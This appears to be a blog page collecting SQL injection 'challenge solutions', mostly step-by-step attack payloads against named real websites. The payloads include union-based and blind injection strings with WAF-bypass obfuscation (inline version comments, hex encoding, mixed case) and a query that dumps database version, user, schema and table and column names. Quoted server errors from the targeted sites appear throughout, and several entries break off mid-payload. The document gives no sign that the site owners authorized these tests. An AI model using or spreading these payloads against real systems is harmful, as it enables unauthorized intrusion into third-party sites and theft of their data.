Computer Learning Tips

Hi guys , Now i am sharing 20 lines of Tips with you to find SQLi and Vulnerable columns in a Website. 20 lines tips for Advance Blind SQLi  1. post data 2. Vulnerable product=* 3. product=1' 4. Blank page 5. product=1'--+ 6. Same blank 7. product=1')--+ product available 8. product=1') group by 1--+ blank page 9. product=1') order/*_*/by 1--+ blank page 10. product=1')--+ product available 11. product=1') order by 11--+ blank page 12. product=1') order by 10--+ product available 13. Columns 10 Let's find vulnerables 14. product=1') and 0 Union Select 15.  1,2,3,4,5,6,7,8,9 10--+ blank page 16. product=1') union select 1,2,3,4,5,6,7,8,9,10--+ blank page 17. product=1') Union/*_*/SeLect 1,2,3,4,5,6,7,8,9,10--+ product available 18. product=1') and 0 ======== blank page 19. product=1') and point (29,1) 20. UnIon/*_*/SeLect 1,2,3,4,5,6,7,8,9,10--+  Vulnerable column 2 and 4 Bounty $$$$$$ Thanks.........

SQLi Solution SQLi Solution http://bwcrank(.)com/Download.php?cid=.10 and@x:=(concat/**_**/((conv(1654995359940503,10,36)),0x3c62723e,0x3c62723e,((/*!50000%53eleCt/**_**/*/+(/*!50000variable_value/**_**/*/)/*!50000from/**_**/*/+/*!50000i%6e%66orMATion_sCHEma.gLOBal_vARIables/**_**/*/+/*!50000where/**_**/*/+/*!50000variable_name/**_**/*/=0x76657273696f6e) ),(/*!50000%53eleCt/**_**/*/(@x)froM(/*!50000%53eleCt/**_**/*/(@x:=0x00),(/*!50000%53eleCt/**_**/*/(0)From(/*!50000information_schema.columns/**_**/*/)where(table_schema=database/**_**/())and(0x00)in(@x:=concat/**_**/(@x,0x3c6c693e,table_name,0x203a3a20,column_name))))x) )) /*!12345%55nioN/**_**/*/ /*!50000%53eleCT/**_**/*/ conCAT/**_**/(0x222f3e,0x3c2f6469763e,0x3c62723e,0x3c666f6e7420636f6c6f723d77686974653e,0x3c62723e,(conv(1654995359940503,10,36)),0x3c62723e,0x3c62723e,0x64617461626173653a3a,schema/**_**/(),0x3c62723e,0x757365723a3a,user/**_**/(),0x3c62723e,0x7665...

SQLi Solution SQLi Solution my solution for :::: SQLi . the link : http://bwcrank.com/Download.php?cid=10 . lets count the columns . http://bwcrank(.)com/Download.php?cid=10 order by 100 -- - . waf :: 您所提交的请求含有不合法的参数，已被网站管理员设置拦截！ . http://bwcrank(.)com/Download.php?cid=10 order by 100 -- - . lets bypass order by >> /*!/*'GHI'*/ xxx */ . http://bwcrank(.)com/Download.php?cid=10 /*!/*'ghi'*/order*/ /*!/*'ghi'*/by*/100-- - . done with error . ?cid=10 /*!/*'ghi'*/order*/ /*!/*'ghi'*/by*/1-- - no error . ?cid=10 /*!/*'ghi'*/order*/ /*!/*'ghi'*/by*/2-- - error . column count 1 . http://bwcrank(.)com/Download.php?cid=10 /*!/*'*/UnIoN*/ /*!/*'*/select*/ 1 -- - . work good . for this rule . * to add your name dont use Hex like 0xBlackRose -for all letters at the same time- , Character Chart CHAR(104) , Binary 0bBlackRose , and you can't add yo...

  solution for {SQLi CHALLENGE } . the link to test . http://www.e-kinologija(.)com/prijave/show_entry.php?manifestation_id=184 . first let's get column count . manifestation_id=184  order by 7 -- - error . manifestation_id=184  order by 6 -- - no error column count is 6  . http://www.e-kinologija(.)com/prijave/show_entry.php?manifestation_id=184 and 0 union /*!50000select*/ 1,2,3,4,5,6 -- - . now there no Vulnerable Columns On Page . I think you will now make all column null or search in source page . but not all column need to be false , some column need to be true to fix like 1,1,1-- - . http://www.e-kinologija(.)com/prijave/show_entry.php?manifestation_id=184 and 0 union /*!50000select*/ 1,1,1,1,1,1 -- - . work good . column 5 need to fix by make it true . http://www.e-kinologija(.)com/prijave/show_entry.php?manifestation_id=184 and 0 union /*!50000select*/ 1,2,3,4,1,6 -- - . and as ' false '  I can add ' true '  to column to fix it like . 1,2,3,4,true,...

  My solution for  {challenge -1} Level :: normal Site>> https://www.direct-seychelles(.)com/v02/fr/hotels_FicheR-tarifs.php?id=312 .................................................................................  https://www.direct-seychelles(.)com/v02/fr/hotels_FicheR-tarifs.php?id=312' Some content of this site is mmissing when added ('). ................................................................................ Let's Count The Number Of Colum. https://www.direct-seychelles(.)com/v02/fr/hotels_FicheR-tarifs.php?id=312' order by 100-- - ❌ https://www.direct-seychelles(.)com/v02/fr/hotels_FicheR-tarifs.php?id=312' order by 1-- - ❌ Same result. ................................................................................ Ok we when add an (@) befor the parameter value, we can see some content of this site is change. https://www.direct-seychelles(.)com/v02/fr/hotels_FicheR-tarifs.php?id=@312' order by 100-- - ❌ https://www.direct-seychelles.com/.....

          <----Solution---->  -------------------------------------------------------------------------- /**_**/ Let's start /**_**/ Site: https://androssov.ru/briefly/post.php?id=1 **okh let's chek the site is vulnerable or not --> https://androssov.ru/briefly/post.php?id=1' Okh we when add an (') after the parameter value, we can see some content of this site is mmissing. **Ok let's Try to fix the site- -->https://androssov.ru/briefly/post.php?id=1'--+- okh the is fixed  **Let's Count The Number Of Colum. ---> https://androssov.ru/briefly/post.php?id=1' order by 10--+-    Error❌ -->https://androssov.ru/briefly/post.php?id=1' order by 9--+- Fixed  That's means in this site have 9 colum..✅ **Okh Let's select the union --> https://androssov.ru/briefly/post.php?id=1'UNION SELECT 1,2,3,4,5,6,7,8,9--+-❎ Ups it's shows 403 Forbidden❌ **Let's try another way to fix the error. --> https://androssov.ru/briefly/post...

  Please follow the steps  ===========Solution=========== http://zoutou(.)net/news_shousai.php?key=17 Let's start checking vulnerability adding ' http://zoutou(.)net/news_shousai.php?key=17' Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: unterminated quoted string at or near "'" at character 59 in /home/zoutou-web/public_html/news_shousai.php on line 99 This is the error. Let's fix this. http://zoutou(.)net/news_shousai.php?key=17'--+- Not fixing Let's try http://zoutou(.)net/news_shousai.php?key=17-- Yes. Fixed. As it fixes with -- Let's count columns. http://zoutou(.)net/news_shousai.php?key=17 order by 1-- 💡 http://zoutou(.)net/news_shousai.php?key=17 order by 100-- 💔 As 1 has no error And 100 has error So,  it means, it will work here In 5 we got no error In 6 we got error So, total possible column is 5 Let's Union select http://zoutou(.)net/news_shousai.php?key=17+AND+0+UNION+SELECT+1,2,3,4,5-- But still error. Let's...